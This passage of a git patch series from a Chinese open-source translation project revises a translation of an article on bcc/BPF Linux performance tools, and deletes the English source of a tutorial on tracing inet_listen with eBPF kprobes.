延迟,但平均值可能会引起误解。 以直方图的形式研究 I/O 延迟的分布是有用的,这可以通过使用 [biolatency] 来实现[18]: ``` # /usr/share/bcc/tools/biolatency @@ -147,9 +132,10 @@ Tracing block device I/O... Hit Ctrl-C to end. 1024 -> 2047 : 117 |******** | 2048 -> 4095 : 8 | | ``` -这是另一个有用的工具和例子; 它使用一个名为maps的BPF特性,它可以用来实现高效的内核内摘要统计。从内核级别到用户级别的数据传输仅仅是“计数”列。 用户级程序生成其余的。 -值得注意的是,其中许多工具支持CLI选项和参数,如其使用信息所示: +这是另一个有用的工具和例子;它使用一个名为 maps 的 BPF 特性,它可以用来实现高效的内核摘要统计。从内核层到用户层的数据传输仅仅是“计数”列。 用户级程序生成其余的。 + +值得注意的是,这种工具大多支持 CLI 选项和参数,如其使用信息所示: ``` # /usr/share/bcc/tools/biolatency -h @@ -175,11 +161,12 @@ examples: ./biolatency -Q # include OS queued time in I/O time ./biolatency -D # show each disk device separately ``` -它们的行为像其他Unix工具是通过设计,以协助采用。 -### 5\. tcplife +它们的行为就像其它 Unix 工具一样,以利于采用而设计。 -另一个有用的工具是[tcplife][19] ,该例显示TCP会话的生命周期和吞吐量统计 +#### 5、 tcplife + +另一个有用的工具是 [tcplife][19] ,该例显示 TCP 会话的生命周期和吞吐量统计。 ``` # /usr/share/bcc/tools/tcplife @@ -189,11 +176,12 @@ PID COMM LADDR LPORT RADDR RPORT TX_KB RX_KB MS 12844 wget 10.0.2.15 34250 54.204.39.132 443 11 1870 5712.26 12851 curl 10.0.2.15 34252 54.204.39.132 443 0 74 505.90 ``` -在你说:“我不能只是刮 tcpdump(8)输出这个?”之前请注意,运行 tcpdump(8)或任何数据包嗅探器,在高数据包速率系统上花费的开销会很大,即使tcpdump(8)的用户级和内核级机制已经过多年优化(可能更差)。tcplife不会测试每个数据包; 它只会监视TCP会话状态的变化,从而影响会话的持续时间。它还使用已经跟踪吞吐量的内核计数器,以及处理和命令信息(“PID”和“COMM”列),这些对 tcpdump(8)等线上嗅探工具是做不到的。 -### 6\. gethostlatency +在你说 “我不是可以只通过 `tcpdump(8)` 就能输出这个?” 之前请注意,运行 `tcpdump(8)` 或任何数据包嗅探器,在高数据包速率的系统上的开销会很大,即使 `tcpdump(8)` 的用户层和内核层机制已经过多年优化(要不可能更差)。`tcplife` 不会测试每个数据包;它只会有效地监视 TCP 会话状态的变化,并由此得到该会话的持续时间。它还使用已经跟踪了吞吐量的内核计数器,以及进程和命令信息(“PID” 和 “COMM” 列),这些对于 `tcpdump(8)` 等线上嗅探工具是做不到的。 -之前的每个例子都涉及到内核跟踪,所以我至少需要一个用户级跟踪的例子。 这是[gethostlatency] [20],其中gethostbyname(3)和相关的库调用名称解析: +#### 6、 gethostlatency + +之前的每个例子都涉及到内核跟踪,所以我至少需要一个用户级跟踪的例子。 这就是 [gethostlatency][20],它检测用于名称解析的 `gethostbyname(3)` 和相关的库调用: ``` # /usr/share/bcc/tools/gethostlatency @@ -207,24 +195,26 @@ TIME PID COMM LATms HOST 06:45:07 12952 curl 13.64 opensource.cats 06:45:19 13139 curl 13.10 opensource.cats ``` -是的,它始终是DNS,所以有一个工具来监视系统范围内的DNS请求可以很方便(这只有在应用程序使用标准系统库时才有效)看看我如何跟踪多个查找“opensource.com”? 第一个是188.98毫秒,然后是更快,不到10毫秒,毫无疑问,缓存的作用。它还追踪多个查找“opensource.cats”,一个可悲的不存在的主机,但我们仍然可以检查第一个和后续查找的延迟。 (第二次查找后是否有一点负面缓存?) -### 7\. trace +是的,总是有 DNS 请求,所以有一个工具来监视系统范围内的 DNS 请求会很方便(这只有在应用程序使用标准系统库时才有效)。看看我如何跟踪多个对 “opensource.com” 的查找? 第一个是 188.98 毫秒,然后更快,不到 10 毫秒,毫无疑问,这是缓存的作用。它还追踪多个对 “opensource.cats” 的查找,一个不存在的可怜主机名,但我们仍然可以检查第一个和后续查找的延迟。(第二次查找后是否有一些否定缓存的影响?) -好的,再举一个例子。 [trace] [21]工具由Sasha Goldshtein提供,并提供了一些基本的printf(1)功能和自定义探针。 例如: +#### 7、 trace + +好的,再举一个例子。 [trace][21] 工具由 Sasha Goldshtein 提供,并提供了一些基本的 `printf(1)` 功能和自定义探针。 例如: ``` # /usr/share/bcc/tools/trace 'pam:pam_start "%s: %s", arg1, arg2' PID TID COMM FUNC - 13266 13266 sshd pam_start sshd: root ``` -在这里,我正在跟踪 libpam 及其 pam_start(3)函数并将其两个参数都打印为字符串。 Libpam 用于可插入的身份验证模块系统,输出显示 sshd 为“root”用户(我登录)调用了 pam_start()。 USAGE消息中有更多的例子(“trace -h”),而且所有这些工具在bcc版本库中都有手册页和示例文件。 例如trace_example.txt和trace.8。 + +在这里,我正在跟踪 `libpam` 及其 `pam_start(3)` 函数,并将其两个参数都打印为字符串。 `libpam` 用于插入式身份验证模块系统,该输出显示 sshd 为 “root” 用户调用了 `pam_start()`(我登录了)。 其使用信息中有更多的例子(`trace -h`),而且所有这些工具在 bcc 版本库中都有手册页和示例文件。 例如 `trace_example.txt` 和 `trace.8`。 ### 通过包安装 bcc -安装 bcc 最佳的方法是从 iovisor 仓储库中安装,按照 bcc [INSTALL.md][22]。[IO Visor] [23]是包含 bcc 的Linux基金会项目。4.x系列Linux内核中增加了这些工具使用的BPF增强功能,上至4.9 \。这意味着拥有4.8内核的 Fedora 25可以运行大部分这些工具。 Fedora 26及其4.11内核可以运行它们(至少目前)。 +安装 bcc 最佳的方法是从 iovisor 仓储库中安装,按照 bcc 的 [INSTALL.md][22] 进行即可。[IO Visor][23] 是包括了 bcc 的 Linux 基金会项目。4.x 系列 Linux 内核中增加了这些工具所使用的 BPF 增强功能,直到 4.9 添加了全部支持。这意味着拥有 4.8 内核的 Fedora 25 可以运行这些工具中的大部分。 使用 4.11 内核的 Fedora 26 可以全部运行它们(至少在目前是这样)。 -如果你使用的是Fedora 25(或者Fedora 26,而且这个帖子已经在很多个月前发布了 - 你好,来自遥远的过去!),那么这个包的方法应该是正常的。 如果您使用的是Fedora 26,那么请跳至“通过源代码安装”部分,该部分避免了已知的固定错误。 这个错误修复目前还没有进入Fedora 26软件包的依赖关系。 我使用的系统是: +如果你使用的是 Fedora 25(或者 Fedora 26,而且这个帖子已经在很多个月前发布了 —— 你好,来自遥远的过去!),那么这个通过包安装的方式是可以工作的。 如果您使用的是 Fedora 26,那么请跳至“通过源代码安装”部分,它避免了一个[已修复的][26]的[已知][25]错误。 这个错误修复目前还没有进入 Fedora 26 软件包的依赖关系。 我使用的系统是: ``` # uname -a @@ -232,7 +222,8 @@ Linux localhost.localdomain 4.11.8-300.fc26.x86_64 #1 SMP Thu Jun 29 20:09:48 UT # cat /etc/fedora-release Fedora release 26 (Twenty Six) ``` -以下是我所遵循的安装步骤,但请参阅INSTALL.md获取更新的版本: + +以下是我所遵循的安装步骤,但请参阅 INSTALL.md 获取更新的版本: ``` # echo -e '[iovisor]\nbaseurl=https://repo.iovisor.org/yum/nightly/f25/$basearch\nenabled=1\ngpgcheck=0' | sudo tee /etc/yum.repos.d/iovisor.repo @@ -242,7 +233,8 @@ Total download size: 37 M Installed size: 143 M Is this ok [y/N]: y ``` -安装完成后,您可以在/ usr / share中看到新的工具: + +安装完成后,您可以在 `/usr/share` 中看到新的工具: ``` # ls /usr/share/bcc/tools/ @@ -250,6 +242,7 @@ argdist dcsnoop killsnoop softirqs trace bashreadline dcstat llcstat solisten ttysnoop [...] ``` + 试着运行其中一个: ``` @@ -262,7 +255,8 @@ Traceback (most recent call last): raise Exception("Failed to compile BPF module %s" % src_file) Exception: Failed to compile BPF module ``` -运行失败,提示/lib/modules/4.11.8-300.fc26.x86_64/build丢失。 如果你也这样做,那只是因为系统缺少内核头文件。 如果你看看这个文件指向什么(这是一个符号链接),然后使用“dnf whatprovides”来搜索它,它会告诉你接下来需要安装的包。 对于这个系统,它是: + +运行失败,提示 `/lib/modules/4.11.8-300.fc26.x86_64/build` 丢失。 如果你也遇到这个问题,那只是因为系统缺少内核头文件。 如果你看看这个文件指向什么(这是一个符号链接),然后使用 `dnf whatprovides` 来搜索它,它会告诉你接下来需要安装的包。 对于这个系统,它是: ``` # dnf install kernel-devel-4.11.8-300.fc26.x86_64 @@ -272,7 +266,8 @@ Installed size: 63 M Is this ok [y/N]: y [...] ``` -现在 + +现在: ``` # /usr/share/bcc/tools/opensnoop @@ -283,11 +278,12 @@ PID COMM FD ERR PATH 11792 ls 3 0 /lib64/libc.so.6 [...] ``` -运行起来了。 这是从另一个窗口中的ls命令捕捉活动。 请参阅前面的部分以获取其他有用的命令 + +运行起来了。 这是捕获自另一个窗口中的 ls 命令活动。 请参阅前面的部分以使用其它有用的命令。 ### 通过源码安装 -如果您需要从源代码安装,您还可以在[INSTALL.md] [27]中找到文档和更新说明。 我在Fedora 26上做了如下的事情: +如果您需要从源代码安装,您还可以在 [INSTALL.md][27] 中找到文档和更新说明。 我在 Fedora 26 上做了如下的事情: ``` sudo dnf install -y bison cmake ethtool flex git iperf libstdc++-static \ @@ -299,16 +295,16 @@ sudo dnf install -y \ sudo pip install pyroute2 sudo dnf install -y clang clang-devel llvm llvm-devel llvm-static ncurses-devel ``` -除 netperf 外一切妥当,其中有以下错误: + +除 `netperf` 外一切妥当,其中有以下错误: ``` Curl error (28): Timeout was reached for http://pkgs.repoforge.org/netperf/netperf-2.6.0-1.el6.rf.x86_64.rpm [Connection timed out after 120002 milliseconds] ``` -不必理会,netperf是可选的 - 它只是用于测试 - 而 bcc 没有它也会编译成功。 - -以下是 bcc 编译和安装余下的步骤: +不必理会,`netperf` 是可选的,它只是用于测试,而 bcc 没有它也会编译成功。 +以下是余下的 bcc 编译和安装步骤: ``` git clone https://github.com/iovisor/bcc.git @@ -317,7 +313,8 @@ cmake .. -DCMAKE_INSTALL_PREFIX=/usr make sudo make install ``` -在这一点上,命令应该起作用: + +现在,命令应该可以工作了: ``` # /usr/share/bcc/tools/opensnoop @@ -329,53 +326,35 @@ PID COMM FD ERR PATH [...] ``` -More Linux resources +### 写在最后和其他的前端 -* [What is Linux?][1] +这是一个可以在 Fedora 和 Red Hat 系列操作系统上使用的新 BPF 性能分析强大功能的快速浏览。我演示了 BPF 的流行前端 [bcc][28] ,并包括了其在 Fedora 上的安装说明。bcc 附带了 60 多个用于性能分析的新工具,这将帮助您充分利用 Linux 系统。也许你会直接通过 SSH 使用这些工具,或者一旦 GUI 监控程序支持 BPF 的话,你也可以通过它们来使用相同的功能。 -* [What are Linux containers?][2] +此外,bcc 并不是正在开发的唯一前端。[ply][29] 和 [bpftrace][30],旨在为快速编写自定义工具提供更高级的语言支持。此外,[SystemTap][31] 刚刚发布[版本3.2][32],包括一个早期的实验性 eBPF 后端。 如果这个继续开发,它将为运行多年来开发的许多 SystemTap 脚本和 tapset(库)提供一个安全和高效的生产级引擎。(随同 eBPF 使用 SystemTap 将是另一篇文章的主题。) -* [Download Now: Linux commands cheat sheet][3] - -* [Advanced Linux commands cheat sheet][4] - -* [Our latest Linux articles][5] - -### 写在最后和其他前端 - -这是一个可以在 Fedora 和 Red Hat 系列操作系统上使用的新 BPF 性能分析强大功能的快速浏览。我演示了BPF的流行前端 [bcc][28] ,并包含了其在 Fedora 上的安装说明。bcc 附带了60多个用于性能分析的新工具,这将帮助您充分利用Linux系统。也许你会直接通过SSH使用这些工具,或者一旦它们支持BPF,你也可以通过监视GUI来使用相同的功能。 - -此外,bcc并不是开发中唯一的前端。[ply][29]和[bpftrace][30],旨在为快速编写自定义工具提供更高级的语言。此外,[SystemTap] [31]刚刚发布[版本3.2] [32],包括一个早期的实验性eBPF后端。 如果这一点继续得到发展,它将为运行多年来开发的许多SystemTap脚本和攻击集(库)提供一个生产安全和高效的引擎。 (使用SystemTap和eBPF将成为另一篇文章的主题。) - -如果您需要开发自定义工具,那么也可以使用 bcc 来实现,尽管语言比 SystemTap,ply 或 bpftrace 要冗长得多。 我的 bcc 工具可以作为代码示例,另外我还贡献了[教程] [33]来开发 Python 中的 bcc 工具。 我建议先学习bcc多工具,因为在需要编写新工具之前,你可能会从里面获得很多里程。 您可以从他们 bcc 存储库[funccount] [34],[funclatency] [35],[funcslower] [36],[stackcount] [37],[trace] [38] ,[argdist] [39] 的示例文件中研究 bcc。 +如果您需要开发自定义工具,那么也可以使用 bcc 来实现,尽管语言比 SystemTap、ply 或 bpftrace 要冗长得多。我的 bcc 工具可以作为代码示例,另外我还贡献了用 Python 开发 bcc 工具的[教程][33]。 我建议先学习 bcc 的 multi-tools,因为在需要编写新工具之前,你可能会从里面获得很多经验。 您可以从它们的 bcc 存储库[funccount] [34],[funclatency] [35],[funcslower] [36],[stackcount] [37],[trace] [38] ,[argdist] [39] 的示例文件中研究 bcc。 感谢[Opensource.com] [40]进行编辑。 -###  专题 +### 关于作者 - [Linux][41][系统管理员][42] +[![Brendan Gregg](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/brendan_face2017_620d.jpg?itok=LIwTJjL9)][43] -### About the author +Brendan Gregg 是 Netflix 的一名高级性能架构师,在那里他进行大规模的计算机性能设计、分析和调优。 - [![](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/brendan_face2017_620d.jpg?itok=LIwTJjL9)][43] Brendan Gregg - -- -Brendan Gregg是Netflix的一名高级性能架构师,在那里他进行大规模的计算机性能设计,分析和调优。[关于更多] [44] - - -* [Learn how you can contribute][6] +(题图:opensource.com) -------------------------------------------------------------------------------- via:https://opensource.com/article/17/11/bccbpf-performance -作者:[Brendan Gregg ][a] +作者:[Brendan Gregg][a] 译者:[yongshouzhang](https://github.com/yongshouzhang) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 -[a]: +[a]:https://opensource.com/users/brendang [1]:https://opensource.com/resources/what-is-linux?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent [2]:https://opensource.com/resources/what-are-linux-containers?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent [3]:https://developers.redhat.com/promotions/linux-cheatsheet/?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent From ff4d262b8c977554cdc714f3735034e8812a03e4 Mon Sep 17 00:00:00 2001 From: wxy Date: Wed, 13 Dec 2017 14:54:04 +0800 Subject: [PATCH 0526/1627] PUB:20171207 7 tools for analyzing performance in Linux with bccBPF.md @yongshouzhang https://linux.cn/article-9139-1.html --- ...1207 7 tools for analyzing performance in Linux with bccBPF.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {translated/tech => published}/20171207 7 tools for analyzing performance in Linux with bccBPF.md (100%) diff --git a/translated/tech/20171207 7 tools for analyzing performance in Linux with bccBPF.md b/published/20171207 7 tools for analyzing performance in Linux with bccBPF.md similarity index 100% rename from translated/tech/20171207 7 tools for analyzing performance in Linux with bccBPF.md rename to published/20171207 7 tools for analyzing performance in Linux with bccBPF.md From e7f9e32c38e07bf137eb7cf7e7d73c599bb4057c Mon Sep 17 00:00:00 2001 From: darksun Date: Wed, 13 Dec 2017 14:58:00 +0800 Subject: [PATCH 0527/1627] rename --- ...207 Cheat – A Collection Of Practical Linux Command Examples.md} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename sources/tech/{20171213 Cheat – A Collection Of Practical Linux Command Examples.md => 20171207 Cheat – A Collection Of Practical Linux Command Examples.md} (100%) diff --git a/sources/tech/20171213 Cheat – A Collection Of Practical Linux Command Examples.md b/sources/tech/20171207 Cheat – A Collection Of Practical Linux Command Examples.md similarity index 100% rename from sources/tech/20171213 Cheat – A Collection Of Practical Linux Command Examples.md rename to sources/tech/20171207 Cheat – A Collection Of Practical Linux Command Examples.md From d7e1f1fca4b2436d75a00f0a4c5e7b5a8e06a5a9 Mon Sep 17 00:00:00 2001 From: qhwdw Date: Wed, 13 Dec 2017 15:19:52 +0800 Subject: [PATCH 0528/1627] Translated by qhwdw --- ...an event Introducing eBPF Kernel probes.md | 363 ------------------ ...an event Introducing eBPF Kernel probes.md | 363 ++++++++++++++++++ 2 files changed, 363 insertions(+), 363 deletions(-) delete mode 100644 sources/tech/20160330 How to turn any syscall into an event Introducing eBPF Kernel probes.md create mode 100644 translated/tech/20160330 How to turn any syscall into an event Introducing eBPF Kernel probes.md diff --git a/sources/tech/20160330 How to turn any syscall into an event Introducing eBPF Kernel probes.md b/sources/tech/20160330 How to turn any syscall into an event Introducing eBPF Kernel probes.md deleted file mode 100644 index 7a4ac2efbe..0000000000 --- a/sources/tech/20160330 How to turn any syscall into an event Introducing eBPF Kernel probes.md +++ /dev/null @@ -1,363 +0,0 @@ -Translating by qhwdw How to turn any syscall into an event: Introducing eBPF Kernel probes -============================================================ - - -TL;DR: Using eBPF in recent (>=4.4) Linux kernel, you can turn any kernel function call into a user land event with arbitrary data. This is made easy by bcc. The probe is written in C while the data is handled by python. - -If you are not familiar with eBPF or linux tracing, you really should read the full post. It tries to progressively go through the pitfalls I stumbled unpon while playing around with bcc / eBPF while saving you a lot of the time I spent searching and digging. - -### A note on push vs pull in a Linux world - -When I started to work on containers, I was wondering how we could update a load balancer configuration dynamically based on actual system state. A common strategy, which works, it to let the container orchestrator trigger a load balancer configuration update whenever it starts a container and then let the load balancer poll the container until some health check passes. It may be a simple “SYN” test. - -While this configuration works, it has the downside of making your load balancer waiting for some system to be available while it should be… load balancing. - -Can we do better? - -When you want a program to react to some change in a system there are 2 possible strategies. The program may  _poll_  the system to detect changes or, if the system supports it, the system may  _push_ events and let the program react to them. Wether you want to use push or poll depends on the context. A good rule of the thumb is to use push events when the event rate is low with respect to the processing time and switch to polling when the events are coming fast or the system may become unusable. For example, typical network driver will wait for events from the network card while frameworks like dpdk will actively poll the card for events to achieve the highest throughput and lowest latency. - -In an ideal world, we’d have some kernel interface telling us: - -> * “Hey Mr. ContainerManager, I’ve just created a socket for the Nginx-ware of container  _servestaticfiles_ , maybe you want to update your state?” -> -> * “Sure Mr. OS, Thanks for letting me know” - -While Linux has a wide range of interfaces to deal with events, up to 3 for file events, there is no dedicated interface to get socket event notifications. You can get routing table events, neighbor table events, conntrack events, interface change events. Just, not socket events. Or maybe there is, deep hidden in a Netlink interface. - -Ideally, we’d need a generic way to do it. How? - -### Kernel tracing and eBPF, a bit of history - -Until recently the only way was to patch the kernel or resort on SystemTap. [SytemTap][5] is a tracing Linux system. In a nutshell, it provides a DSL which is then compiled into a kernel module which is then live-loaded into the running kernel. Except that some production system disable dynamic module loading for security reasons. Including the one I was working on at that time. The other way would be to patch the kernel to trigger some events, probably based on netlink. This is not really convenient. Kernel hacking come with downsides including “interesting” new “features” and increased maintenance burden. - -Hopefully, starting with Linux 3.15 the ground was laid to safely transform any traceable kernel function into userland events. “Safely” is common computer science expression referring to “some virtual machine”. This case is no exception. Linux has had one for years. Since Linux 2.1.75 released in 1997 actually. It’s called Berkeley Packet Filter of BPF for short. As its name suggests, it was originally developed for the BSD firewalls. It had only 2 registers and only allowed forward jumps meaning that you could not write loops with it (Well, you can, if you know the maximum iterations and you manually unroll them). The point was to guarantee the program would always terminate and hence never hang the system. Still not sure if it has any use while you have iptables? It serves as the [foundation of CloudFlare’s AntiDDos protection][6]. - -OK, so, with Linux the 3.15, [BPF was extended][7] turning it into eBPF. For “extended” BPF. It upgrades from 2 32 bits registers to 10 64 bits 64 registers and adds backward jumping among others. It has then been [further extended in Linux 3.18][8] moving it out of the networking subsystem, and adding tools like maps. To preserve the safety guarantees, it [introduces a checker][9] which validates all memory accesses and possible code path. If the checker can’t guarantee the code will terminate within fixed boundaries, it will deny the initial insertion of the program. - -For more history, there is [an excellent Oracle presentation on eBPF][10]. - -Let’s get started. - -### Hello from from `inet_listen` - -As writing assembly is not the most convenient task, even for the best of us, we’ll use [bcc][11]. bcc is a collection of tools based on LLVM and Python abstracting the underlying machinery. Probes are written in C and the results can be exploited from python allowing to easily write non trivial applications. - -Start by install bcc. For some of these examples, you may require a recent (read >= 4.4) version of the kernel. If you are willing to actually try these examples, I highly recommend that you setup a VM.  _NOT_  a docker container. You can’t change the kernel in a container. As this is a young and dynamic projects, install instructions are highly platform/version dependant. You can find up to date instructions on [https://github.com/iovisor/bcc/blob/master/INSTALL.md][12] - -So, we want to get an event whenever a program starts to listen on TCP socket. When calling the `listen()` syscall on a `AF_INET` + `SOCK_STREAM` socket, the underlying kernel function is [`inet_listen`][13]. We’ll start by hooking a “Hello World” `kprobe` on it’s entrypoint. - -``` -from bcc import BPF - -# Hello BPF Program -bpf_text = """ -#include -#include - -// 1\. Attach kprobe to "inet_listen" -int kprobe__inet_listen(struct pt_regs *ctx, struct socket *sock, int backlog) -{ - bpf_trace_printk("Hello World!\\n"); - return 0; -}; -""" - -# 2\. Build and Inject program -b = BPF(text=bpf_text) - -# 3\. Print debug output -while True: - print b.trace_readline() - -``` - -This program does 3 things: 1\. It attaches a kernel probe to “inet_listen” using a naming convention. If the function was called, say, “my_probe”, it could be explicitly attached with `b.attach_kprobe("inet_listen", "my_probe"`. 2\. It builds the program using LLVM new BPF backend, inject the resulting bytecode using the (new) `bpf()` syscall and automatically attaches the probes matching the naming convention. 3\. It reads the raw output from the kernel pipe. - -Note: eBPF backend of LLVM is still young. If you think you’ve hit a bug, you may want to upgrade. - -Noticed the `bpf_trace_printk` call? This is a stripped down version of the kernel’s `printk()`debug function. When used, it produces tracing informations to a special kernel pipe in `/sys/kernel/debug/tracing/trace_pipe`. As the name implies, this is a pipe. If multiple readers are consuming it, only 1 will get a given line. This makes it unsuitable for production. - -Fortunately, Linux 3.19 introduced maps for message passing and Linux 4.4 brings arbitrary perf events support. I’ll demo the perf event based approach later in this post. - -``` -# From a first console -ubuntu@bcc:~/dev/listen-evts$ sudo /python tcv4listen.py - nc-4940 [000] d... 22666.991714: : Hello World! - -# From a second console -ubuntu@bcc:~$ nc -l 0 4242 -^C - -``` - -Yay! - -### Grab the backlog - -Now, let’s print some easily accessible data. Say the “backlog”. The backlog is the number of pending established TCP connections, pending to be `accept()`ed. - -Just tweak a bit the `bpf_trace_printk`: - -``` -bpf_trace_printk("Listening with with up to %d pending connections!\\n", backlog); - -``` - -If you re-run the example with this world-changing improvement, you should see something like: - -``` -(bcc)ubuntu@bcc:~/dev/listen-evts$ sudo python tcv4listen.py - nc-5020 [000] d... 25497.154070: : Listening with with up to 1 pending connections! - -``` - -`nc` is a single connection program, hence the backlog of 1\. Nginx or Redis would output 128 here. But that’s another story. - -Easy hue? Now let’s get the port. - -### Grab the port and IP - -Studying `inet_listen` source from the kernel, we know that we need to get the `inet_sock` from the `socket` object. Just copy from the sources, and insert at the beginning of the tracer: - -``` -// cast types. Intermediate cast not needed, kept for readability -struct sock *sk = sock->sk; -struct inet_sock *inet = inet_sk(sk); - -``` - -The port can now be accessed from `inet->inet_sport` in network byte order (aka: Big Endian). Easy! So, we could just replace the `bpf_trace_printk` with: - -``` -bpf_trace_printk("Listening on port %d!\\n", inet->inet_sport); - -``` - -Then run: - -``` -ubuntu@bcc:~/dev/listen-evts$ sudo /python tcv4listen.py -... -R1 invalid mem access 'inv' -... -Exception: Failed to load BPF program kprobe__inet_listen - -``` - -Except that it’s not (yet) so simple. Bcc is improving a  _lot_  currently. While writing this post, a couple of pitfalls had already been addressed. But not yet all. This Error means the in-kernel checker could prove the memory accesses in program are correct. See the explicit cast. We need to help is a little by making the accesses more explicit. We’ll use `bpf_probe_read` trusted function to read an arbitrary memory location while guaranteeing all necessary checks are done with something like: - -``` -// Explicit initialization. The "=0" part is needed to "give life" to the variable on the stack -u16 lport = 0; - -// Explicit arbitrary memory access. Read it: -// Read into 'lport', 'sizeof(lport)' bytes from 'inet->inet_sport' memory location -bpf_probe_read(&lport, sizeof(lport), &(inet->inet_sport)); - -``` - -Reading the bound address for IPv4 is basically the same, using `inet->inet_rcv_saddr`. If we put is all together, we should get the backlog, the port and the bound IP: - -``` -from bcc import BPF - -# BPF Program -bpf_text = """ -#include -#include -#include - -// Send an event for each IPv4 listen with PID, bound address and port -int kprobe__inet_listen(struct pt_regs *ctx, struct socket *sock, int backlog) -{ - // Cast types. Intermediate cast not needed, kept for readability - struct sock *sk = sock->sk; - struct inet_sock *inet = inet_sk(sk); - - // Working values. You *need* to initialize them to give them "life" on the stack and use them afterward - u32 laddr = 0; - u16 lport = 0; - - // Pull in details. As 'inet_sk' is internally a type cast, we need to use 'bpf_probe_read' - // read: load into 'laddr' 'sizeof(laddr)' bytes from address 'inet->inet_rcv_saddr' - bpf_probe_read(&laddr, sizeof(laddr), &(inet->inet_rcv_saddr)); - bpf_probe_read(&lport, sizeof(lport), &(inet->inet_sport)); - - // Push event - bpf_trace_printk("Listening on %x %d with %d pending connections\\n", ntohl(laddr), ntohs(lport), backlog); - return 0; -}; -""" - -# Build and Inject BPF -b = BPF(text=bpf_text) - -# Print debug output -while True: - print b.trace_readline() - -``` - -A test run should output something like: - -``` -(bcc)ubuntu@bcc:~/dev/listen-evts$ sudo python tcv4listen.py - nc-5024 [000] d... 25821.166286: : Listening on 7f000001 4242 with 1 pending connections - -``` - -Provided that you listen on localhost. The address is displayed as hex here to avoid dealing with the IP pretty printing but that’s all wired. And that’s cool. - -Note: you may wonder why `ntohs` and `ntohl` can be called from BPF while they are not trusted. This is because they are macros and inline functions from “.h” files and a small bug was [fixed][14]while writing this post. - -All done, one more piece: We want to get the related container. In the context of networking, that’s means we want the network namespace. The network namespace being the building block of containers allowing them to have isolated networks. - -### Grab the network namespace: a forced introduction to perf events - -On the userland, the network namespace can be determined by checking the target of `/proc/PID/ns/net`. It should look like `net:[4026531957]`. The number between brackets is the inode number of the network namespace. This said, we could grab it by scrapping ‘/proc’ but this is racy, we may be dealing with short-lived processes. And races are never good. We’ll grab the inode number directly from the kernel. Fortunately, that’s an easy one: - -``` -// Create an populate the variable -u32 netns = 0; - -// Read the netns inode number, like /proc does -netns = sk->__sk_common.skc_net.net->ns.inum; - -``` - -Easy. And it works. - -But if you’ve read so far, you may guess there is something wrong somewhere. And there is: - -``` -bpf_trace_printk("Listening on %x %d with %d pending connections in container %d\\n", ntohl(laddr), ntohs(lport), backlog, netns); - -``` - -If you try to run it, you’ll get some cryptic error message: - -``` -(bcc)ubuntu@bcc:~/dev/listen-evts$ sudo python tcv4listen.py -error: in function kprobe__inet_listen i32 (%struct.pt_regs*, %struct.socket*, i32) -too many args to 0x1ba9108: i64 = Constant<6> - -``` - -What clang is trying to tell you is “Hey pal, `bpf_trace_printk` can only take 4 arguments, you’ve just used 5.“. I won’t dive into the details here, but that’s a BPF limitation. If you want to dig it, [here is a good starting point][15]. - -The only way to fix it is to… stop debugging and make it production ready. So let’s get started (and make sure run at least Linux 4.4). We’ll use perf events which supports passing arbitrary sized structures to userland. Additionally, only our reader will get it so that multiple unrelated eBPF programs can produce data concurrently without issues. - -To use it, we need to: - -1. define a structure - -2. declare the event - -3. push the event - -4. re-declare the event on Python’s side (This step should go away in the future) - -5. consume and format the event - -This may seem like a lot, but it ain’t. See: - -``` -// At the begining of the C program, declare our event -struct listen_evt_t { - u64 laddr; - u64 lport; - u64 netns; - u64 backlog; -}; -BPF_PERF_OUTPUT(listen_evt); - -// In kprobe__inet_listen, replace the printk with -struct listen_evt_t evt = { - .laddr = ntohl(laddr), - .lport = ntohs(lport), - .netns = netns, - .backlog = backlog, -}; -listen_evt.perf_submit(ctx, &evt, sizeof(evt)); - -``` - -Python side will require a little more work, though: - -``` -# We need ctypes to parse the event structure -import ctypes - -# Declare data format -class ListenEvt(ctypes.Structure): - _fields_ = [ - ("laddr", ctypes.c_ulonglong), - ("lport", ctypes.c_ulonglong), - ("netns", ctypes.c_ulonglong), - ("backlog", ctypes.c_ulonglong), - ] - -# Declare event printer -def print_event(cpu, data, size): - event = ctypes.cast(data, ctypes.POINTER(ListenEvt)).contents - print("Listening on %x %d with %d pending connections in container %d" % ( - event.laddr, - event.lport, - event.backlog, - event.netns, - )) - -# Replace the event loop -b["listen_evt"].open_perf_buffer(print_event) -while True: - b.kprobe_poll() - -``` - -Give it a try. In this example, I have a redis running in a docker container and nc on the host: - -``` -(bcc)ubuntu@bcc:~/dev/listen-evts$ sudo python tcv4listen.py -Listening on 0 6379 with 128 pending connections in container 4026532165 -Listening on 0 6379 with 128 pending connections in container 4026532165 -Listening on 7f000001 6588 with 1 pending connections in container 4026531957 - -``` - -### Last word - -Absolutely everything is now setup to use trigger events from arbitrary function calls in the kernel using eBPF, and you should have seen most of the common pitfalls I hit while learning eBPF. If you want to see the full version of this tool, along with some more tricks like IPv6 support, have a look at [https://github.com/iovisor/bcc/blob/master/tools/solisten.py][16]. It’s now an official tool, thanks to the support of the bcc team. - -To go further, you may want to checkout Brendan Gregg’s blog, in particular [the post about eBPF maps and statistics][17]. He his one of the project’s main contributor. - - --------------------------------------------------------------------------------- - -via: https://blog.yadutaf.fr/2016/03/30/turn-any-syscall-into-event-introducing-ebpf-kernel-probes/ - -作者:[Jean-Tiare Le Bigot ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://blog.yadutaf.fr/about -[1]:https://blog.yadutaf.fr/tags/linux -[2]:https://blog.yadutaf.fr/tags/tracing -[3]:https://blog.yadutaf.fr/tags/ebpf -[4]:https://blog.yadutaf.fr/tags/bcc -[5]:https://en.wikipedia.org/wiki/SystemTap -[6]:https://blog.cloudflare.com/bpf-the-forgotten-bytecode/ -[7]:https://blog.yadutaf.fr/2016/03/30/turn-any-syscall-into-event-introducing-ebpf-kernel-probes/TODO 